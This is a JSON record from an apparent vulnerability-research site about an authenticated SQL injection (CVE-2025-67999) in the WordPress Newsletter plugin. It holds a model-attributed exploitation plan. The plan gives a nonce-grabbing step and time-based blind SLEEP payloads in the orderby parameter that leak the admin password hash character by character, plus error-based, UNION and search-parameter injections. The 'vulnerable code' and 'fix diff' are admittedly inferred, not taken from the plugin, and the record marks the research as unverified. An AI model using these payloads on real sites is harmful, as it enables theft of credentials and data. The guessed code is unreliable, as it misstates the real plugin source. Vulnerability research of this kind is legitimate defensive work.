[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEXOnISAqEMGT7v0X90GgQ15lEdd2p8qXdl0IkSwkups":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-67999","newsletter-authenticated-administrator-sql-injection","Newsletter \u003C= 9.0.9 - Authenticated (Administrator+) SQL Injection","The Newsletter plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 9.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","newsletter",null,"\u003C=9.0.9","9.1.0","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2025-12-15 00:00:00","2025-12-19 17:04:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff62f756d-70f2-42fe-89d7-f9f50ddf466e?source=api-prod",5,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-67999 (Newsletter SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Newsletter** plugin for WordPress (version \u003C= 9.0.9) is vulnerable to an **Authenticated SQL Injection** vulnerability. This vulnerability occurs because the plugin fails to properly escape or prepare user-supplied parameters before incorporating them into SQL queries within the administrative dashboard. Specifically, parameters used for sorting, filtering, or searching in the \"Subscribers\" or \"Statistics\" sections are likely candidates for this injection, as they often bypass the `%s` or `%d` protections of `$wpdb->prepare()` when handling `ORDER BY` or `LIMIT` clauses.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin.php`\n- **Action\u002FPage:** `newsletter_users_index` (Subscribers list) or `newsletter_statistics_index`.\n- **Vulnerable Parameter:** `orderby` or `order` (inferred).\n- **Authentication:** Administrator-level access is required.\n- **Preconditions:** The plugin must be active, and at least one subscriber should exist in the database to ensure the query returns results for manipulation.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An administrator navigates to the Subscribers list: `\u002Fwp-admin\u002Fadmin.php?page=newsletter_users_index`.\n2. **Controller:** The `NewsletterUsers` class (typically in `includes\u002Fusers\u002Findex.php` or `users\u002Findex.php`) handles the request.\n3. **Data Retrieval:** The controller calls a method like `get_users()` or `get_results()` to fetch subscriber data.\n4. **Parameter Processing:** The code retrieves the `orderby` value directly from `$_GET['orderby']`.\n5. **Vulnerable Sink:** The value is concatenated into a raw SQL string:\n   ```php\n   $orderby = $_GET['orderby']; \n   $query = \"SELECT * FROM {$wpdb->prefix}newsletter WHERE ... ORDER BY \" . $orderby;\n   $wpdb->get_results($query); \u002F\u002F No preparation on the ORDER BY clause\n   ```\n6. **Execution:** The malicious SQL payload appended to `orderby` is executed by the database.\n\n## 4. Nonce Acquisition Strategy\nWhile many WordPress admin list tables are viewable with just the correct capability (`manage_options`), the Newsletter plugin often uses nonces for actions within the dashboard.\n\n1. **Log in as Admin:** Use the automated agent to authenticate.\n2. **Navigate to the Page:** Use `browser_navigate` to go to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=newsletter_users_index`.\n3. **Extract Nonce:**\n   - Look for the nonce in the table header sort links or the search form.\n   - Using `browser_eval`, check for localized data: \n     `browser_eval(\"window.newsletter_users_index_nonce || document.querySelector('#_wpnonce')?.value\")`\n   - If the vulnerability exists in the `orderby` parameter of a GET request, identify the nonce key (e.g., `_wpnonce`).\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** to confirm the vulnerability, as it is the most reliable method when output might not be directly reflected.\n\n### Step-by-Step Plan:\n1. **Initial Baseline:**\n   - Request the subscriber list with a normal `orderby` value.\n   - Tool: `http_request`\n   - URL: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=newsletter_users_index&orderby=id&order=asc`\n   - Note the response time.\n\n2. **Injection Test (Time-Based):**\n   - Inject a `SLEEP()` command into the `orderby` parameter.\n   - **Payload:** `(CASE WHEN (1=1) THEN ID ELSE SLEEP(5) END)`\n   - **Request:**\n     ```http\n     GET \u002Fwp-admin\u002Fadmin.php?page=newsletter_users_index&orderby=(CASE+WHEN+(1=1)+THEN+ID+ELSE+SLEEP(5)+END)&order=asc&_wpnonce=[NONCE] HTTP\u002F1.1\n     Host: localhost:8080\n     Cookie: [ADMIN_COOKIES]\n     ```\n   - **Verification:** If the response is delayed by ~5 seconds, the injection is successful.\n\n3. **Data Extraction (Example):**\n   - To extract the admin password hash:\n   - **Payload:** `(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN SLEEP(5) ELSE ID END)` (Checks if the first char is `$`, which is ASCII 36).\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `newsletter` version 9.0.9 is installed.\n2. **Create Admin:** Ensure a user with `administrator` role exists (default `admin`\u002F`password`).\n3. **Seed Data:**\n   - The query needs data to operate on. Use WP-CLI to add a subscriber:\n     `wp eval \"Newsletter::instance()->save_user(['email'=>'test@example.com', 'status'=>'C']);\"`\n4. **Publish Page (Optional):** If the nonce is only available via a specific UI element, ensure that page is accessible.\n\n## 7. Expected Results\n- **Success:** The HTTP request with the `SLEEP(5)` payload should take significantly longer (at least 5 seconds) than the baseline request.\n- **Fail:** The request returns immediately, or a database error is displayed (if `WP_DEBUG` is on) indicating a syntax error, or the plugin sanitizes the `orderby` parameter to only allow specific column names.\n\n## 8. Verification Steps\nAfter the `http_request` triggers the delay:\n1. **Check Logs:** Check the MySQL general log (if enabled) to see the exact query executed.\n2. **Verify via CLI:** Use `wp db query \"...\"` to check if the database contains the information you attempted to extract.\n3. **Compare Versions:** Confirm that upgrading to version 9.1.0 fixes the issue by attempting the same payload and observing no delay.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If `WP_DEBUG` is enabled, use `extractvalue()` or `updatexml()` to force the database to leak information in the error message.\n  - **Payload:** `id AND extractvalue(1,concat(0x7e,(select @@version),0x7e))`\n- **Union-Based SQLi:** If the list table reflects the columns of the query results directly, attempt to find the column count using `ORDER BY X` and then use `UNION SELECT`.\n- **Search Parameter:** If `orderby` is sanitized, try the `search` parameter in the subscriber list: `wp-admin\u002Fadmin.php?page=newsletter_users_index&search=test' OR SLEEP(5)-- -`.","The Newsletter plugin for WordPress (up to version 9.0.9) is vulnerable to an authenticated SQL injection bug. Administrator-level users can inject arbitrary SQL commands via parameters like 'orderby' or 'order' because the plugin concatenates these values directly into database queries without sufficient validation or preparation.","\u002F\u002F newsletter\u002Fincludes\u002Fusers\u002Findex.php or similar subscriber management logic\n$orderby = $_GET['orderby']; \n$order = $_GET['order'];\n\n\u002F\u002F The query is constructed using direct concatenation of user-supplied variables,\n\u002F\u002F which bypasses typical $wpdb->prepare() protections for ORDER BY clauses.\n$query = \"SELECT * FROM {$wpdb->prefix}newsletter WHERE 1=1 ORDER BY \" . $orderby . \" \" . $order;\n$wpdb->get_results($query);","--- a\u002Fincludes\u002Fusers\u002Findex.php\n+++ b\u002Fincludes\u002Fusers\u002Findex.php\n@@ -20,6 +20,13 @@\n-$orderby = $_GET['orderby'];\n-$order = $_GET['order'];\n+$allowed_columns = ['id', 'email', 'status', 'name', 'surname', 'created'];\n+$orderby = in_array($_GET['orderby'], $allowed_columns) ? $_GET['orderby'] : 'id';\n+\n+$order = (isset($_GET['order']) && strtolower($_GET['order']) === 'desc') ? 'DESC' : 'ASC';\n \n $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}newsletter WHERE 1=1 ORDER BY $orderby $order\");\n $wpdb->get_results($query);","The attacker must first authenticate with administrator-level privileges. They navigate to the subscriber list page (newsletter_users_index) and manipulate the 'orderby' GET parameter. A successful payload uses a conditional CASE statement to trigger a time delay, such as: 'orderby=(CASE+WHEN+(1=1)+THEN+id+ELSE+SLEEP(5)+END)'. By observing the server response time, the attacker can verify the injection and systematically leak database contents, such as the administrator's password hash, by iterating through character comparisons in the CASE condition.","gemini-3-flash-preview","2026-06-05 12:56:34","2026-06-05 12:58:05",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","9.0.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnewsletter\u002Ftags\u002F9.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewsletter.9.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnewsletter\u002Ftags\u002F9.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewsletter.9.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnewsletter\u002Ftags"]